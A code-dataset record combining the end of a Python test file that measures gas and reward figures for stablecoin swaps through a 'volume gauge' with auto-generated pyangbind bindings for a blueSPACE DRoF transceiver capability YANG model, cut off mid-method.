print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(USDC)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(USDC)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_underlying_busd_to_usdc(_busdvolgauge, busdpool, BUSD, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _busdvolgauge.exchange_underlying(3, 1, 50 * 10 ** 18, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = busdpool.exchange_underlying(3, 1, 50 * 10 ** 18, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(BUSD)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(BUSD)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_underlying_usdt_to_busd(_busdvolgauge, busdpool, USDC, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _busdvolgauge.exchange_underlying(1, 3, 50 * 10 ** 6, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = busdpool.exchange_underlying(1, 3, 50 * 10 ** 6, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(USDC)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(USDC)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
def test_exchange_underlying_busd_to_usdt(_busdvolgauge, busdpool, BUSD, tracker, accounts):
for i in range(5):
print("Attemp #" + str(i + 1) + " .....")
last_reward_amount = tracker.rewardAmount()
tx = _busdvolgauge.exchange_underlying(3, 1, 50 * 10 ** 18, 0, {'from': accounts[0]})
vgas = tx.gas_used
print("VGaugeGas : " + str(vgas) + " Unit")
tx = busdpool.exchange_underlying(3, 1, 50 * 10 ** 18, 0, {'from': accounts[0]})
print("OriginGas : " + str(tx.gas_used) + " Unit")
print("ConsumedGasByVolumeGauge : " + str(vgas - tx.gas_used) + " Unit")
current_reward_amount = tracker.rewardAmount()
lastvolumedata = tracker.lastVolumeData(BUSD)
last_volume = lastvolumedata[0]
last_amount = lastvolumedata[1]
currentvolumedata = tracker.currentVolumeData(BUSD)
current_volume = currentvolumedata[0]
current_amount = currentvolumedata[1]
newvolume = ALPHA * last_volume + (DENOMINATOR - ALPHA) * current_volume
newamount = ALPHA * last_amount + (DENOMINATOR - ALPHA) * current_amount
price_v_ema = newvolume / newamount
print("price_by_volume_EMA* : " + str(price_v_ema / DENOMINATOR) + " CRV")
print("reward_amount : " + str(current_reward_amount) + " (" + str(current_reward_amount / DENOMINATOR) + " CRV)")
print("increased_reward_amount_in_CRV : " + str(float(current_reward_amount - last_reward_amount) / DENOMINATOR) + " CRV")
| 61.555556
| 130
| 0.648209
| 4,017
| 36,010
| 5.550162
| 0.017177
| 0.103342
| 0.081812
| 0.066741
| 0.991254
| 0.990312
| 0.990312
| 0.990312
| 0.990312
| 0.990312
| 0
| 0.021757
| 0.222688
| 36,010
| 584
| 131
| 61.660959
| 0.774749
| 0.000472
| 0
| 0.876122
| 0
| 0
| 0.116693
| 0.036008
| 0
| 0
| 0
| 0
| 0
| 1
| 0.043088
| false
| 0
| 0.001795
| 0
| 0.044883
| 0.301616
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d75e51d447a4a8c0118e1c36621cf3b0c22e5d78
| 84,818
|
py
|
Python
|
Netconf/bindings/bindingCapability.py
|
lrodrin/transceivers
|
62b8e44c0a459615a0464a9567e28e195c4dabf1
|
[
"MIT"
] | null | null | null |
Netconf/bindings/bindingCapability.py
|
lrodrin/transceivers
|
62b8e44c0a459615a0464a9567e28e195c4dabf1
|
[
"MIT"
] | null | null | null |
Netconf/bindings/bindingCapability.py
|
lrodrin/transceivers
|
62b8e44c0a459615a0464a9567e28e195c4dabf1
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improved)
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
class yc_supportable_capacity_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_capacity(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module blueSPACE-DRoF-TP-capability - based on the path /DRoF-TP-capability/supportable-capacity. Each member element of
the container is represented as a class variable - with a specific
YANG type.
"""
__slots__ = ('_path_helper', '_extmethods', '__max_capacity','__min_capacity',)
_yang_name = 'supportable-capacity'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__max_capacity = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="max-capacity", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='uint32', is_config=False)
self.__min_capacity = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="min-capacity", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='uint32', is_config=False)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return ['DRoF-TP-capability', 'supportable-capacity']
def _get_max_capacity(self):
"""
Getter method for max_capacity, mapped from YANG variable /DRoF_TP_capability/supportable_capacity/max_capacity (uint32)
YANG Description: e.g 50
"""
return self.__max_capacity
def _set_max_capacity(self, v, load=False):
"""
Setter method for max_capacity, mapped from YANG variable /DRoF_TP_capability/supportable_capacity/max_capacity (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_max_capacity is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_max_capacity() directly.
YANG Description: e.g 50
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="max-capacity", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """max_capacity must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="max-capacity", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='uint32', is_config=False)""",
})
self.__max_capacity = t
if hasattr(self, '_set'):
self._set()
def _unset_max_capacity(self):
self.__max_capacity = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="max-capacity", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='uint32', is_config=False)
def _get_min_capacity(self):
"""
Getter method for min_capacity, mapped from YANG variable /DRoF_TP_capability/supportable_capacity/min_capacity (uint32)
YANG Description: e.g 5
"""
return self.__min_capacity
def _set_min_capacity(self, v, load=False):
"""
Setter method for min_capacity, mapped from YANG variable /DRoF_TP_capability/supportable_capacity/min_capacity (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_min_capacity is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_min_capacity() directly.
YANG Description: e.g 5
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="min-capacity", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """min_capacity must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="min-capacity", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='uint32', is_config=False)""",
})
self.__min_capacity = t
if hasattr(self, '_set'):
self._set()
def _unset_min_capacity(self):
self.__min_capacity = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="min-capacity", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='uint32', is_config=False)
max_capacity = __builtin__.property(_get_max_capacity)
min_capacity = __builtin__.property(_get_min_capacity)
_pyangbind_elements = OrderedDict([('max_capacity', max_capacity), ('min_capacity', min_capacity), ])
class yc_supportable_constellation_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_constellation(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module blueSPACE-DRoF-TP-capability - based on the path /DRoF-TP-capability/supportable-constellation. Each member element of
the container is represented as a class variable - with a specific
YANG type.
"""
__slots__ = ('_path_helper', '_extmethods', '__constellation_id','__mod_type',)
_yang_name = 'supportable-constellation'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__mod_type = YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'blueSPACE-DRoF-TP-capability:qam64': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam8': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:bpsk': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:qam128': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam256': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam32': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'bpsk': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam16': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam64': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:qam32': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:qam16': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:qam4': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam128': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam4': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:qam256': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:qam8': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}},), is_leaf=True, yang_name="mod-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='identityref', is_config=False)
self.__constellation_id = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="constellation-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return ['DRoF-TP-capability', 'supportable-constellation']
def _get_constellation_id(self):
"""
Getter method for constellation_id, mapped from YANG variable /DRoF_TP_capability/supportable_constellation/constellation_id (string)
"""
return self.__constellation_id
def _set_constellation_id(self, v, load=False):
"""
Setter method for constellation_id, mapped from YANG variable /DRoF_TP_capability/supportable_constellation/constellation_id (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_constellation_id is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_constellation_id() directly.
"""
parent = getattr(self, "_parent", None)
if parent is not None and load is False:
raise AttributeError("Cannot set keys directly when" +
" within an instantiated list")
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="constellation-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """constellation_id must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="constellation-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)""",
})
self.__constellation_id = t
if hasattr(self, '_set'):
self._set()
def _unset_constellation_id(self):
self.__constellation_id = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="constellation-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
def _get_mod_type(self):
"""
Getter method for mod_type, mapped from YANG variable /DRoF_TP_capability/supportable_constellation/mod_type (identityref)
"""
return self.__mod_type
def _set_mod_type(self, v, load=False):
"""
Setter method for mod_type, mapped from YANG variable /DRoF_TP_capability/supportable_constellation/mod_type (identityref)
If this variable is read-only (config: false) in the
source YANG file, then _set_mod_type is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_mod_type() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'blueSPACE-DRoF-TP-capability:qam64': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam8': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:bpsk': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:qam128': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam256': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam32': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'bpsk': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam16': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam64': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:qam32': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:qam16': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:qam4': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam128': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam4': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:qam256': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:qam8': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}},), is_leaf=True, yang_name="mod-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='identityref', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """mod_type must be of a type compatible with identityref""",
'defined-type': "blueSPACE-DRoF-TP-capability:identityref",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'blueSPACE-DRoF-TP-capability:qam64': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam8': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:bpsk': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:qam128': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam256': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam32': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'bpsk': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam16': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam64': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:qam32': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:qam16': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:qam4': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam128': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam4': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:qam256': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:qam8': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}},), is_leaf=True, yang_name="mod-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='identityref', is_config=False)""",
})
self.__mod_type = t
if hasattr(self, '_set'):
self._set()
def _unset_mod_type(self):
self.__mod_type = YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'blueSPACE-DRoF-TP-capability:qam64': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam8': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:bpsk': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:qam128': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam256': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam32': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'bpsk': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam16': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam64': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:qam32': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:qam16': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:qam4': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam128': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'qam4': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:qam256': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}, 'blueSPACE-DRoF-TP-capability:qam8': {'@namespace': 'urn:blueSPACE-DRoF-TP-capability', '@module': 'blueSPACE-DRoF-TP-capability'}},), is_leaf=True, yang_name="mod-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='identityref', is_config=False)
constellation_id = __builtin__.property(_get_constellation_id)
mod_type = __builtin__.property(_get_mod_type)
_pyangbind_elements = OrderedDict([('constellation_id', constellation_id), ('mod_type', mod_type), ])
class yc_supportable_nominal_central_frequency_range_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_nominal_central_frequency_range(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module blueSPACE-DRoF-TP-capability - based on the path /DRoF-TP-capability/supportable-nominal-central-frequency-range. Each member element of
the container is represented as a class variable - with a specific
YANG type.
"""
__slots__ = ('_path_helper', '_extmethods', '__adjustment_granularity','__grid_type','__lower_frequency','__upper_frequency',)
_yang_name = 'supportable-nominal-central-frequency-range'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__upper_frequency = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="upper-frequency", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
self.__lower_frequency = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="lower-frequency", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
self.__adjustment_granularity = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="adjustment-granularity", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
self.__grid_type = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="grid-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return ['DRoF-TP-capability', 'supportable-nominal-central-frequency-range']
def _get_adjustment_granularity(self):
"""
Getter method for adjustment_granularity, mapped from YANG variable /DRoF_TP_capability/supportable_nominal_central_frequency_range/adjustment_granularity (string)
YANG Description: e.g 6.25GHz
"""
return self.__adjustment_granularity
def _set_adjustment_granularity(self, v, load=False):
"""
